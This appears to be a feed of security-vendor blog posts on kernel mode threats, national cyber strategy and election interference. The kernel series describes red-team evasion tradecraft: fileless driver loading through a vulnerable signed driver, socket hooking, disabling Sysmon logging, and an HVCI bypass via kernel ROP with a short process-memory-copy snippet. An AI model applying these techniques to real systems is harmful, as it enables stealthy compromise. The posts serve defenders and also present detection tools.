    Over the past 12 months we have worked hard to expand our platform capabilities and make it even more accessible for users of any skill level to defend their organizations against threat actors. Over the Summer, we released MalwareScore for macros, a feature that uses machine learning to automatically detect and prevent malware for emerging targets like Microsoft Office macros. We also followed up on the release of Artemis, the world’s first intelligent assistant for cyber defense, with Resolver to simplify how security professionals identify the origin and the extent of a compromise through an attack visualization. We collaborated with the MITRE Corporation to validate the performance of the Endgame platform against the ATT&CK Matrix, and became the first endpoint protection vendor to go beyond the scope of malware-based efficacy against nation-state level attacks. Finally, Endgame championed transparency in security through the release of cutting-edge open source cybersecurity tools including Red Team Automation, Xori and Ember that aim to support the next generation of defenders.

    What all of these initiatives have in common is making security attainable to a wider range of professionals in the face of increasingly sophisticated attacks - but we’re not done yet. Endgame is already the standard endpoint protection platform across much of the U.S. federal government, and thanks to our team’s continued technology innovation and focus on ease-of-use, we have seen unprecedented success in the commercial sector as well. Endgame’s commercial customer base has grown fivefold in 2018 alone, across critical industries such as financial services, energy and healthcare.

    While Endgame is already a proud advocate of cloud for its scalability and streamlining of processes, we know there is more opportunity to innovate our product to meet the growing demands of organizations that are taking a cloud-first approach. We are committed to continuing to scale and strengthen our platform to ensure Endgame is the last endpoint protection agent our customers will ever need.

    We want to say thank you - to our customers for their vote of confidence in our technology, to our incredible team of researchers, engineers and support staff for sharing our vision, and to Forbes, for recognizing our commitment through this award. In the words of Frank Sinatra, “The best is yet to come!”

    Kernel Mode Threats & Practical Defenses: Part 1

    $
    0
    0

    Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware including TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. Kernel mode threats generally have total control over the affected machine, can re-write the rules of the operating system, and can easily tamper with security software.


    APT groups realize these benefits and are exploiting them to stay ahead of defenders. In this first of a two-part series stemming from our recent Black Hat talk on kernel mode threats, we will dive deep into the evolution of kernel mode threats and the current state of these attacks. Through thoughtful integration of extant, in-the-wild exploits and tactics, attackers have access to a range of capabilities that enable more sophisticated and hard-to-detect kernel mode attacks. Our next post will focus on defending against these attacks, but first it is essential to understand the state of the art of kernel mode threats. Through these two posts, we hope to increase the community’s exposure to these threats and ultimately improve the industry’s defensive posture.

     

    Evolution of Kernel Threats and Platform Protections

     

    Early Kernel Malware

    Over 10 years ago, the first truly widespread kernel malware came onto the scene. There were no operating system defenses for these threats at the time, so they flourished. Rustock, TDSS, and ZeroAccess malware families had millions of infections at their peaks. They all shared a similar technique for gaining ring0 execution by infecting existing drivers on disk. They also commonly included rootkit features for hiding files, processes, and network connections from users and security software.

    In response to the widespread malware of the late 2000s, Microsoft introduced two technologies that sought to mitigate these threats. The first was PatchGuard. PatchGuard is designed to detect rootkit-style techniques, such as hooking, and then crash the machine. PatchGuard is not perfect and can be bypassed, but it is continually evolving, making it a moving obstacle for attackers.

    Microsoft also created another protection: Driver Signature Enforcement, or DSE. DSE requires that all drivers be signed with a valid signature before they can be loaded. DSE prevents drivers that have been infected with malware (breaking the digital signature in the process) from loading on the system. It also prevents directly loading unsigned malicious drivers. Both defenses became more important as the market share of 64-bit Windows increased.

     

    Bootkit Malware

    To evade DSE (and in some cases PatchGuard), malware authors began leveraging bootkits to get their malware loaded into kernel mode. Bootkits tamper with code associated with the early operating system boot process, such as the MBR, VBR, or other OS-specific bootloader code.

    This includes the original proof of concept eEye BootRoot, along with widespread threats such as Sinowal, TDL4, and XPaj. One interesting aspect of XPaj was its ability to bypass PatchGuard by performing hooks early in the boot process, even before PatchGuard itself was initialized. This meant PatchGuard would implicitly trust the hooks as part of the legitimate code.

    The security industry responded to bootkit malware by creating Secure Boot. This technology is baked into the Unified Extensible Firmware Interface (UEFI) specification, and was implemented by Microsoft starting in Windows 8. Secure Boot works by having the UEFI runtime (which is a replacement for legacy BIOS) validate the digital signature of the OS boot loader before executing it.

    Any modifications by malware would result in an unbootable PC. Microsoft expanded this approach with Trusted Boot, which works similarly to Secure Boot but continues this signature validation throughout the entire boot process. The downside to Secure Boot is that it doesn't protect against compromised firmware, because the firmware runs before Secure Boot's checks. However, technologies like Intel's Boot Guard counter firmware attacks by moving the "root of trust" all the way into an immutable section of the CPU.

     

    Bring Your Own Vuln

    While DSE, PatchGuard, and Secure Boot have dramatically reduced the landscape of commodity kernel mode threats, nation-state level threats continue to find creative ways to circumvent these platform protections. APT-level kernel mode malware often installs a legitimate, signed vulnerable driver which is then exploited to gain kernel code execution, thereby side-stepping DSE. Threats such as Uroburos, Derusbi, and Slingshot have all employed this approach. Another notable technique, leveraged by Derusbi and other groups, is to steal legitimate certificates and use them to sign malware drivers.

    ​Even more advanced nation-state level threats, such as Duqu, do not bother with installing and exploiting a vulnerable driver. Instead, they exploit the kernel directly with an 0day. To further evade detection, Duqu hooks the import address table of an installed Kaspersky driver, and tricks the driver into thinking its malicious user process was a trusted Kaspersky process. The Kaspersky driver would then whitelist it completely, as well as prevent it from being terminated by the local users or other malware.​ For actual persistence, Duqu dropped a driver implant to disk in the network DMZ. This driver was signed with a stolen Foxconn certificate. This implant serves as a gateway into the entire network as it could redirect network traffic to any internal destination.

    DOUBLEPULSAR is also worth a strong mention. It is a very lightweight kernel mode implant that lives only in memory; it has no reboot persistence. It is typically loaded onto a system using a remote ring0 exploit such as ETERNALBLUE. DOUBLEPULSAR gives attackers stealthy remote access to the system by hooking a function pointer in the SMBv1 driver (srv.sys). At the time, this function pointer was not monitored by PatchGuard. From there it allows attackers to load more kernel mode code, or inject a full featured payload into user mode. It became a widespread threat after it was leaked and picked up by other adversaries, such as in the WannaCry and NotPetya attacks.

    To mitigate attacks from adversaries who exploit their way to kernel mode, Microsoft released Virtualization Based Security, or VBS. With VBS, the kernel is sandboxed by the hypervisor and no longer has complete control over the system.

    Hypervisor Code Integrity (HVCI) extends VBS and requires all kernel code be signed. Furthermore, kernel memory is no longer allowed to be both writable and executable (known as W^X). HVCI stops many kernel mode threats such as Turla Driver Loader (discussed in our next post) and DOUBLEPULSAR.​ Credential Guard also leverages the hypervisor to protect credentials from tools like mimikatz​.

     

    Looking Ahead

    The mitigations discussed thus far are only a prominent subset of the kernel mitigations that Microsoft has implemented in the last 10 years, and Microsoft has significantly increased its investment against these threats in more recent OS versions (especially Win10). However, market share remains a major concern. A large user base is still running Win7, and many organizations that have upgraded to Win10 are not yet leveraging the most advanced kernel protections. Because these protections are still not widely implemented, attackers will continue to pursue low cost kernel attacks.

    So what can be done to protect against kernel mode threats? In our next post, we will present our latest research on offensive tradecraft, which directly informs how we protect against these threats. This includes the role of red and blue exercises, hunting, and real-time protections. Although kernel mode threats will continue to evolve, the state of the art in malware detection has also advanced to hinder these new kernel mode threats. Next, we will equip you with new detections and insights to stay a step ahead of evolving kernel mode threats.

    Continuity and Change within the New National Cyber Strategy

    $
    0
    0

    The release of the National Cyber Strategy (NCS) yesterday marks the culmination of multiple new cyber policy directives and strategic documents. From the continuous engagement described in the Command Vision for US Cyber Command to rescinding Presidential Policy Directive 20 to the Department of Homeland Security Cybersecurity Strategy, there is obvious momentum for the modernization of cyber strategy. The NCS is notable both for its continuity with previous strategies as well as for some significant pivots. As is true with all strategies, the key to modernizing cyber policy now relies on implementation.

     

    Reasserting American Leadership to Preserve a Free and Open Internet

    At a time when malicious cyber-enabled activity is targeting democracies across the globe, the NCS reaffirms not only American commitment to a free and open internet, but also American global leadership “to ensure that our approach to an open Internet is the international standard.” In this regard, the NCS reflects continuity with previous strategies with the focus on international cooperation and the promotion of the multi-stakeholder model for a free and open internet that protects privacy and civil liberties. It also is a counterpunch to China’s global push for cyber sovereignty and China Standards 2035, including technical standards across industries.

     

    Elevating the Private Sector

    The NCS also provides meaningful distinction from other strategic documents. First, this strategy arguably has as much focus on the private sector as the public. This is most evident in the frequent discussion of collaboration with like-minded entities, including information sharing as well as protecting critical infrastructure. However, a key priority within the strategy is to “clarify the roles and responsibilities of Federal agencies and the expectations on the private sector related to cybersecurity risk management and incident response.” Instead of the current patchwork policies – such as different breach notification laws for each state – this may mean a more coherent and transparent approach to private/public sector protections and responses.

    The NCS also addresses the need to incentivize robust cybersecurity investments, greater adaptability within infrastructure, and more secure supply chains. Discussions on fostering incentives for improved security usually allude to tax incentives. As more details on implementation become clear, it is notable to see a broader approach and new strategy that may offer ‘carrots’ for responsible cybersecurity.

    Also of note for the private sector is a modernization of laws and infrastructure. The NCS prioritizes the modernization of electronic surveillance and computer crime laws, the latter of which may allude to the long overdue updating of the thirty-year old Computer Fraud and Abuse Act. The NCS also highlights the role of automation and data analytics, including leveraging commercial-off-the-shelf capabilities. Each of these areas may also present opportunities for the private sector.

     

    Much Ado About Offense?

    Finally, following the rescinding of PPD-20 and the release of this week’s Department of Defense Cyber Strategy, there has been much consternation over a potential green light for unconstrained offensive cyber. It certainly is true that the administration is transitioning from a reactive to a proactive approach to counter malicious cyber activity. However, claiming unfettered offensive cyber authorities is an oversimplification of an extremely complex challenge in the same way that ‘pew pew maps’ (i.e., a hodgepodge of directed laser beams scattered across a global map) oversimplify the cyber threat landscape. It makes for great eye candy and sound bites but distracts from the core message.

    The NCS is definitely stronger in a focus on actively countering malicious cyber activity than previous strategies, but it balances cost imposition and deterrence. That is, it balances offense and defense, while focusing on peace through strength. In fact, the NCS places much of this discussion largely within the norms framework. Offensive cyber is not even referenced within the NCS. Instead, the NCS focuses on the integration of cyber with all instruments of national power to counter the threats. It definitely is a stronger, more proactive approach, but it also is a strong counter to concerns of unfettered offensive cyber authorities.

     

    Implementing Change

    Of course, with every strategy, the key is implementation. The NCS, and other recent strategic documents, lay a solid foundation for strengthening democracy and preserving a free and open internet through collaboration with allies and the private sector, while countering and imposing costs on adversaries. However, their efficacy rests largely on the implementation of these core priorities. For example, a handful of proposed bipartisan election security bills simply have not progressed in Congress. If the NCS and other strategic documents are truly going to instigate greater protection, deterrence, and resilience, the same sense of urgency must now resonate across the government and within the private sector to structure a viable roadmap to achieve the vision.

    Kernel Mode Threats & Practical Defenses: Part 2

    $
    0
    0

    In our last post, we described the evolution of kernel mode threats. These remain a prominent mode of compromise for nation-state attackers, as they are difficult to detect and enable robust persistence. Despite advances in platform protections, kernel mode threats continue to evolve and have been employed in many high profile attacks, such as WannaCry and NotPetya. What can organizations do to protect against kernel mode threats? Fortunately, the state of the art in defense also has evolved to counter this impactful attack trend.

    Our own offensive tradecraft research informs our approach to improving defenses against kernel threat vectors. We will first cover our own research, which evolved from Red versus Blue exercises, and then detail deeper analysis into evading current platform protections. With the state of the art in offensive tradecraft established, we will then discuss several approaches to defending against kernel mode threats, and introduce two open source tools that can help. Some are fast wins, while others involve hunting and establishing real-time protections. In all cases, we still highly recommend upgrading to the latest Windows 10 and enabling as many protections as feasible in your organization.

     

    Offensive Tradecraft Research

    To test and push the boundaries of our defenses, it is essential to comprehend the state of the art in offensive tradecraft. During an internal red vs blue, we first explored leveraging kernel mode malware to evade endpoint security products and the most commonly deployed kernel protections (such as Driver Signature Enforcement). Next, we investigated methods for evading the most advanced kernel protections such as Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI).

     

    Red vs. Blue

    Endgame periodically conducts internal Red vs Blue exercises to test our product and team’s skills. The Red Team is tasked with emulating adversaries of varying sophistication levels. This includes everything from very noisy commodity malware to mid and upper tier APTs. Typically, those of us on the Red Team try to stay stealthy with the latest user-mode in-memory techniques. However, our Blue Team is constantly upping their game and became increasingly efficient at zeroing in on our user mode injection techniques. We decided to pursue kernel-mode in-memory techniques to raise the bar.

    Turla Driver Loader (TDL) was a key piece of our kernel tradecraft. TDL is an open source implementation of the Turla/Uroburos driver loading technique. In a nutshell, it will load a vulnerable VirtualBox driver. From there, the VirtualBox driver is exploited to load and execute arbitrary kernel shellcode. TDL is built with shellcode that leverages a technique like "MemoryModule" in user mode to manually map an arbitrary driver and call its entry point. Using TDL helps the Red Team achieve two objectives: evade driver signature enforcement and never write our driver to disk on the target machine.

    ​We had some other high level design goals for the implant. First, we wanted to avoid any user mode components. A very typical design is to use a kernel mode component which injects into a user mode process for performing the primary "implant" functions. The kernel mode malware referenced in these two posts have some user mode components. Avoiding user mode is more time consuming for basic features, but we felt it would be worth it. Injecting anything into user mode would have a high chance of getting caught by our Blue Team. ​This required us to do our network command and control from kernel mode. We chose Winsock Kernel (WSK) as our networking choice because it is very well documented, has great sample code, and presents a relatively easy interface for doing network communications from the kernel.​

    To further confuse our Blue Team, we did not want a beacon style implant. Beaconing is by far the most popular technique for malware and we knew it was something they would be looking for on the range. Our initial port opening concept unfortunately could be detected easily. We settled on a more stealthy approach by re-using the DoublePulsar function pointer hook trick to hijack an existing kernel socket. However, we didn't want to leverage the same hook point, expecting it to now be monitored by PatchGuard. After digging around in various stock network enabled drivers we settled on the srvnet driver, which opens port 445. Our driver egg hunts to locate and hook srvnet’s WskAccept function with our own accept function. This allows our implant to selectively hijack port 445 traffic.

     

     

    Leveraging TDL meant that our kernel driver would never touch disk; however, there was still a high risk that the loader itself could be caught. As a result, we wanted to ensure the loading process itself was as fileless as possible. This meant starting the chain with either PowerShell or JavaScript. We opted for JavaScript due to its generally lower visibility for defenders. Instead of launching cscript/wscript directly, we used the squiblydoo technique to run a scriptlet from a regsvr32 process. For our actual Black Hat demo (below), we updated this to use SquiblyTwo and the winrm.vbs evasion technique.

    From here, we used DotNetToJScript to load and execute an arbitrary .NET executable from JavaScript. We could have exploited and loaded our driver from this .NET executable, but the code for doing this was already written in C. The easier option was to use a MemoryModule-style .NET loader to load and execute the native executable. The native executable (TDL) would then load the vulnerable VirtualBox driver and exploit it to load and map our implant driver into memory. In this whole process, the only executable that truly touched disk in native form was the legitimate VirtualBox driver.

     

     

    Demo 1: Fileless Kernel Mode

     

    Evading VBS/HVCI

    When we were accepted to present at Black Hat, we wanted to push the bounds of our offensive tradecraft. Currently, Microsoft's Virtualization Based Security (VBS) combined with Hypervisor Code Integrity (HVCI) will block any unsigned code from ever running in the kernel. This includes DoublePulsar and the implant we wrote for our RvB exercise.

    We first identified a vulnerable driver, because the VirtualBox driver from TDL won't load while HVCI is enabled. There is a virtually unlimited supply of vulnerable drivers; we grabbed a known-vulnerable sample from Parvez Anwar's site. Since we had the option to choose the vulnerability brought to the endpoint, we chose an easy-to-exploit write-what-where vulnerability, as opposed to a more difficult one like a static one-byte write. The latter would typically involve some pool corruption (like a win32k GDI object) to achieve a full read/write primitive. Since the vulnerable driver would dereference a user-supplied pointer when doing the overwrite, it also gave us a handy arbitrary read primitive.

    HVCI prevents unsigned code from running in the kernel. However, it does nothing to protect the integrity of kernel mode data, and tampering with key data structures can significantly compromise system integrity. For example, attackers can "NOP" out certain function calls by modifying the IAT. They can disable EDR kernel-to-user communications or security-focused kernel ETW providers such as Microsoft-Windows-Threat-Intelligence. Data corruption attacks can also be leveraged to elevate privileges by modifying tokens or handles; many other techniques are possible.

    To explore the real world implications of this, we examined the sysmon driver's method for sending events from kernel mode to user mode for logging. We found that if we modified the IoCsqRemoveNextIrp pointer in the Import Address Table (IAT) to point to a xor rax, rax; ret gadget, events would no longer be logged. A real world attacker could selectively drop events to avoid raising suspicion. It's worth pointing out this is not in any way a flaw in sysmon, as likely every security product is vulnerable to data corruption attacks like this. However, Microsoft could potentially expand VBS to protect certain data regions which should not be modified (such as the IAT in this example).

    While data corruption attacks do their part keeping us up at night, we wanted to explore whether it was still possible to achieve arbitrary code execution. A talk from Microsoft's Dave Weston at BlueHat IL provided excellent detail on the design of VBS. However, it also clued us in to a gap in the current approach with regard to rear edge control flow guard. Essentially, it is still open season for return oriented programming (ROP) attacks in the Windows kernel.

    As mentioned in Peter Hlavaty's 2015 REcon talk, a read-write primitive can be abused to perform stack hooking and achieve code execution via ROP. We were interested in weaponizing this technique against an HVCI-hardened system. We created a surrogate thread as our hooking target. From there, our PoC would dynamically build a ROP chain based on the number of parameters in the target function; it required only 10 gadgets to achieve a full N-argument function call primitive. Next, we exploited the signed, vulnerable driver to corrupt the kernel stack of the surrogate thread and execute the generated ROP chain. The end result is that our PoC could call any arbitrary kernel mode function. For example, attackers could leverage this to inject into protected user mode processes and remain largely invisible to AV/EDR. The video below demonstrates how to bypass HVCI using this technique.

     

    // Example: a WriteProcessMemory-style helper built on the ROP-based
    // N-argument call primitive (CallFunction) described above.
    NTSTATUS WPM(DWORD_PTR targetProcess, DWORD_PTR destAddress, void * pBuf, SIZE_T Size)
    {
        SIZE_T Result;
        // Resolve the current EPROCESS to use as the copy source
        DWORD_PTR srcProcess = CallFunction("PsGetCurrentProcess");
    
        // Copy pBuf into the target process's address space from kernel mode
        LONG ntStatus = CallFunction("MmCopyVirtualMemory", srcProcess, 
            (DWORD_PTR)pBuf, targetProcess, destAddress, Size, KernelMode, (DWORD_PTR)&Result);
    
        return ntStatus;
    }

     

     

    Demo 2: Evading Hypervisor Code Integrity

     

     

    Defending Against Kernel Mode Threats

    First and foremost, the simplest thing you can do to defend your enterprise from kernel mode threats is to ensure that you are eventing on driver loads. There are readily-available tools to do this, including SysInternals Sysmon and Windows Defender Application Control in audit mode. You should be looking for low-prevalence and known-exploitable drivers. It’s important to build a baseline if possible. As many of you know, you have to understand your company's assets and infrastructure before you can begin looking for adversaries. The same applies for understanding the exposure of kernel modules throughout your organization​.

    If possible, defenders should deploy hypervisor code integrity policies to block most legacy drivers. Ideally, you should be whitelisting driver publishers, but maintaining effective whitelists can be very hard. At a minimum, you should mandate WHQL signatures on all drivers. To get a WHQL signature, you have to upload your driver to Microsoft. This theoretically mitigates the threat of stolen certificates because attackers can no longer stealthily sign their malware. However, WHQL is not a panacea. For example, the driver we exploited to evade HVCI is WHQL signed.

    Additionally, defenders can supplement code integrity policies with blacklisting of known-exploitable drivers. Starting with Windows 10 Redstone 5, Microsoft will block many known-exploitable drivers by default if HVCI is enabled. This is great for some users, but it doesn’t help those who are running earlier versions of Windows, or who are on Redstone 5 but can’t enable HVCI.​

     

    Open Source Defense: Kernel Attack Surface Reduction (KASR)

    To help mitigate the risk of these forever-days for the rest of the world, we released KASR, a free tool which blocks a list of known-exploitable drivers. KASR adds a roadblock for unsophisticated attackers re-using known exploits.  We understand that blacklisting does not scale. It will not prevent attackers who know how to find and exploit vulnerabilities in kernel drivers, but we hope that it will at least stop script kiddies from rampaging around in the kernel.​ Microsoft is in the process of finalizing their RS5 driver blacklist.  When it is complete, we will incorporate it into a future version of KASR.​

     

     

    Kernel Hunting

    Looking back at our RvB, we realized that we needed a better way to hunt for kernel mode threats like DoublePulsar and our fileless implant. Traditional forensic-style techniques involve full memory acquisition and offline analysis, which are both time and bandwidth-intensive. This approach doesn’t scale. To address this problem, we leveraged the same techniques to acquire kernel memory, but instead did the analysis on the endpoint, similar to what "blackbox" rootkit scanners have done for years. This means we can complete a scan in milliseconds.​

     

    There are several techniques available to read physical memory on a Windows machine, including the PhysicalMemory device and MDL-based APIs. One of our favorites was Page Table Entry Remapping (shown above) due to its simplicity and performance.​

     

    Our goal was to generically detect DoublePulsar as it lay dormant, without signatures. We could have scanned through kernel pool/heap memory looking for shellcode-like memory blobs, but on Windows 7 the entire NonPagedPool is executable, leaving a fairly large search space that seemed prone to false positives.

    Instead, we focused on identifying the function pointer hook. The first trick is to identify where function pointers exist in memory. Function pointers are absolute addresses, which means they need to be relocated if the image is relocated. Thus, to find function pointers, we walk the PE relocation tables of all loaded drivers. Next, we check whether the relocated value points to an executable section of the driver in the original on-disk copy. Then we check whether the value in memory points outside of any loaded driver. Finally, if the unbacked memory region it points to is executable, we consider this a hit.

    This technique detects both DoublePulsar and the socket handler hook installed by our kernel mode implant. We released Marta, a free tool that leverages this technique to scan all drivers on the system (typically in milliseconds) and identify any active infections. We named it Marta after Marta Burgay, the first astronomer to discover a real-life double pulsar. Demo 3 in the following section shows Marta quickly identifying a dormant DoublePulsar infection.
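    The scan logic itself is compact once memory acquisition and PE parsing are in place. Below is a simplified Python-flavored sketch of the check described above; the input layout and the read_ptr/is_executable_va callbacks are hypothetical stand-ins for that plumbing, not Marta's actual interface.

    def find_hooked_function_pointers(drivers, read_ptr, is_executable_va):
        # drivers: list of dicts with 'name', 'base', 'end', 'reloc_rvas' (RVAs from the
        # PE relocation table) and 'code_ptr_rvas' (relocations whose on-disk value points
        # into an executable section); read_ptr/is_executable_va wrap the memory primitive
        ranges = [(d['base'], d['end']) for d in drivers]
        hits = []
        for d in drivers:
            for rva in d['reloc_rvas']:
                if rva not in d['code_ptr_rvas']:
                    continue                                  # not a function pointer on disk
                live = read_ptr(d['base'] + rva)              # pointer value currently in memory
                if any(lo <= live < hi for lo, hi in ranges):
                    continue                                  # still points inside a loaded driver
                if is_executable_va(live):                    # unbacked but executable: likely a hook
                    hits.append((d['name'], hex(rva), hex(live)))
        return hits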

     

    Realtime Protections

    On-demand scans are great, but we wanted to take this a step further and see if we could catch, and potentially stop, these types of attacks in real time (before any damage is done).​ Having worked on Endgame’s HA-CFI™ product, we are familiar with the Performance Monitoring Unit, or PMU, present on most modern CPUs.  The PMU is a component of the CPU that can be programmed to count the number of times specific low-level events occur on each core.  In this case, we're using indirect near call branch mispredictions. When one of these events occurs, the PMU generates an interrupt, which executes our interrupt service routine.  In this routine, we have a chance to validate and enforce a policy. ​The video below demonstrates our real-time approach to detecting DoublePulsar as a system is infected.

     

    Demo 3: Detecting DOUBLEPULSAR

     

    ​To detect unbacked code execution, we keep a list of memory ranges corresponding to the loaded drivers, and validate that the instruction pointer resides within one of those ranges.​ However, our proof of concept suffers from a few weaknesses, including the fact that PatchGuard itself uses unbacked pages in an attempt to hinder reverse engineering.  While it’s fun to catch PatchGuard, this false positive would need to be addressed in a reliable and robust manner, which is difficult given the fact that PatchGuard is undocumented and subject to change at any time.​ Another weakness is that kernel code has the ability to program the PMU. An attacker with knowledge of this system could reprogram the PMU or disable interrupts.​ Finally, as with all kernel drivers, this unbacked detection driver is vulnerable to data attacks, such as IAT patching or attacks on our policy structures. 

    As we mentioned earlier, there are currently no kernel protections against ROP (rear flow CFG). Microsoft’s plan to defend against ROP requires Intel Control-flow Enforcement Technology (CET). While promising, CET doesn’t exist in any production processor today.

    To cover this gap, we propose a PMU-based protection system that can detect rear flow control flow policy violations. We can configure the CPU's Last Branch Record (LBR) mechanism to record every return in the kernel into a circular buffer. We can generate a control flow policy by scanning all the loaded drivers and identifying call instructions; immediately after these call instructions are their corresponding return sites. The policy we generate is a bitmap listing these valid return sites. We generate the policy at startup and update it as new drivers are loaded.
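    As a rough illustration, policy generation boils down to recording the address immediately after every call instruction in loaded driver code. In the sketch below, capstone is used purely for illustration, a Python set stands in for the real bitmap, and code_sections is a hypothetical input rather than our actual code.

    from capstone import Cs, CS_ARCH_X86, CS_MODE_64

    def build_return_site_policy(code_sections):
        # code_sections: iterable of (bytes, virtual_address) pairs for each loaded
        # driver's executable sections (a hypothetical input for this sketch)
        md = Cs(CS_ARCH_X86, CS_MODE_64)
        valid_returns = set()
        for code, base in code_sections:
            for insn in md.disasm(code, base):
                if insn.mnemonic == 'call':
                    # the address immediately after a call is a legitimate return site
                    valid_returns.add(insn.address + insn.size)
        return valid_returns

    def is_call_preceded(return_address, valid_returns):
        # the check applied to each return address captured in the LBR
        return return_address in valid_returns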

    ​Generating an interrupt for every return instruction is too costly. Instead we exploit the fact that ROP tends to generate a lot of branch mispredictions. We program the PMU to only generate interrupts for mispredicted branches. When the interrupt fires, we validate every return address that was recorded in the LBR.  If any of them are not in the aforementioned policy (aka not call preceded), we consider that a control flow violation.​ If you don’t tune these systems correctly, they can generate too many interrupts and adversely affect system performance. As the demo below shows, with proper tuning we saw roughly a 1% reduction in the JetStream browser benchmark score, while still maintaining 100% detection rate against our exploit.​ The final demo below walks through kernel mode ROP detection.

     

    Demo 4: Detecting Kernel ROP

     

     

    Conclusion

    Windows platform security has greatly improved over the last decade, but kernel mode threats are still a big concern.​ To leverage the latest defenses from Microsoft, you should upgrade to the latest Windows 10 and enable as many protections as feasible in your organization (Secure Boot, VBS, HVCI, etc). Virtualization Based Security is the single largest pain point from a kernel mode attacker’s perspective, but unfortunately it does come with many compatibility issues. Ensure that you are collecting telemetry on the drivers being loaded across your endpoints. Leverage this data to spot anomalous or vulnerable drivers being loaded. Finally, leverage tools that allow you to hunt and detect kernel mode malware that may already be present in your network. Though this may seem like a large endeavor, we hope these two blogs and our two open source tools help raise awareness of kernel mode threats and facilitate protections as these threats evolve.


    Election Interference: Think Globally, Act Locally

    $
    0
    0

    Election interference analyses remain retrospective and insular, focusing largely on the U.S. 2016 presidential election, and the cyber-enabled data theft, disinformation, and bots involved. That was by no means the first time an entity digitally compromised part of the election infrastructure, and it won’t be the last attempt. A decade ago, reports suggest China stole data from both the McCain and Obama campaigns, and intelligence and national security experts warn that multiple actors may attempt to influence the 2018 U.S. midterm elections.

    Election interference has been attempted as long as there have been elections. However, digital innovations have introduced a new range of attack vectors aimed at compromising everything from voting machines to hearts and minds. According to Freedom House, at least 18 countries experienced some form of election interference in 2016. Given the growing relevance of digital election interference, and with midterm elections a month away, it is useful to explore the range of election interference tactics attempted globally to best comprehend the current state and motivations of adversarial behavior, and in turn structure defenses accordingly.

     

    Think Globally

    There have always been creative, and often deadly, ways to influence election outcomes, running the gamut from coup attempts to illicit funding to voter suppression. While those are certainly still a concern, it is necessary to better comprehend 'election hacking', a nebulous concept broadly applied as an umbrella term for a wide range of election interference activities. Through global analysis of recent election interference, a few categories emerge and offer insights into how to best protect a core component of American democracy.

     

    Website Interference

    Website defacement and interruptions are perhaps the most common digital election interference tactic, likely due to the low cost, skills, and resources required. These attacks often target official websites and social media sites for campaigns, candidates, and political parties, as well as media outlets and government institutions.

    There have already been at least two U.S. municipal campaigns hit with distributed denial of service (DDoS) attacks, but this has been a global trend for several years. In 2014, Ukraine's election commission website experienced a DDoS attack and was forced to briefly shut down just before parliamentary elections. A news website was also vandalized, displaying graphic images instead of political ads.

    More recently, German Chancellor Angela Merkel's website was attacked prior to an election debate last year, and local party branches were increasingly probed for vulnerabilities. A DDoS attack hit the Mexican National Action Party (PAN) website earlier this year during a debate, while the website of Taiwan's Democratic Progressive Party (DPP) was vandalized and its content replaced with Chinese propaganda. Candidates' social media accounts are also prime targets, as Nicolas Maduro discovered when his Twitter account was hacked following his election. Voter registration and voting information sites are also at risk: during the Brexit referendum, the crash of the voter registration site may have resulted from a DDoS attack.
     

    Data Access & Manipulation

    Data access, theft, and manipulation is arguably the most prominent and impactful form of election interference. The targets include politicians and members of their campaigns, as well as voting machines and voter registration databases. Spear phishing is perhaps the most common attack vector in this category, although servers are also targeted and often found unprotected. As the breach of John Podesta's personal email demonstrates, both personal and business email are targeted.

    These attacks have disrupted elections globally, often resulting in leaked and/or manipulated emails aimed at weakening or embarrassing a candidate. During the 2017 French presidential election, then presidential candidate Emmanuel Macron’s emails were leaked days prior to the election. Almost nine gigabytes of data were leaked, and quickly followed by various bot-driven campaigns to disseminate the data. In the run-up to Cambodia’s July election, numerous organizations connected to the opposition party and voting process, including the National Election Commission as well as members of Parliament, were victims of a phishing campaign. In this case, the motive appears to be espionage.

    There also is the example of Andres Sepulveda, who allegedly has made a career out of interfering in Latin American elections by leading a “team of hackers that stole campaign strategies, manipulated social media to create false waves of enthusiasm and derision, and installed spyware in opposition offices.” Over the last decade, these campaigns allegedly focused on elections in Nicaragua, Panama, Honduras, El Salvador, Colombia, Mexico, Costa Rica, Guatemala, and Venezuela. The motivation in this case seems purely financial.

    Voter registration sites are also prime targets. These tend to be more sophisticated attacks, often with the intent to steal credentials to access the larger database. At least 21 states' voter registration databases were targeted (and one compromised) during the U.S. 2016 presidential election. In the Philippines, the election commission website was first vandalized and then compromised, resulting in the leak of 55 million voters' data as well as the defacement of the site. For comparison, this breach was over twice as large as the U.S. Office of Personnel Management compromise.

    Finally, ballot-box stuffing and ballot fraud are by no means new, so hacking voting machines has understandably received a lot of attention as a target for data manipulation. With more than a dozen U.S. states lacking an audit trail, some voting machines containing backdoors, and election machine compromise proven a legitimate concern at recent security conferences, states are increasingly prioritizing voting machine security. Interestingly, U.S. concerns about voting machine compromise have permeated diplomatic discussions. Nikki Haley, U.S. Ambassador to the United Nations, warned Congo against using electronic voting machines, in favor of paper ballots, for its December elections. Congo's current machines are not only susceptible to manipulation; experts are also concerned about their inability to guarantee secrecy.

     

    Controlling the narrative: Disinformation and disruptions

    While Russian trolls are understandably the most notorious disinformation group, many state and state-affiliated groups often seek to control the narrative. This form of election interference largely occurs through disinformation campaigns - defined by Facebook as inaccurate or manipulated information/content that is intentionally spread - or through information disruptions.

    Focusing first on disinformation, seemingly every recent European election has been targeted, ranging from elections in Italy, Sweden, and Turkey to referendums in Ireland, the United Kingdom, and Macedonia. Elections across the globe face similar disinformation threats. Former national security advisor H.R. McMaster acknowledged similar disinformation tactics targeting the Mexican presidential election. In Kenya, disinformation in content and imagery surrounding the 2017 elections was aimed at instigating conflict and exacerbating societal divisions, including videos that portrayed election violence from previous years as live. In fact, in the recent survey The Reality of Fake News in Kenya, 87% of respondents suspected they had received intentionally misleading or fake information.

    While most think of social media as the key medium for spreading disinformation, Moldova provides an illustrative example of additional tactics. Prior to local elections in Moldova, doctored videos were inserted into a news segment by a self-proclaimed news outlet, demonstrating the impact of basic video manipulation. These basic manipulations pale in comparison to what is on the horizon with voice mimicry and the emerging deepfake technologies currently being discussed in Congress.

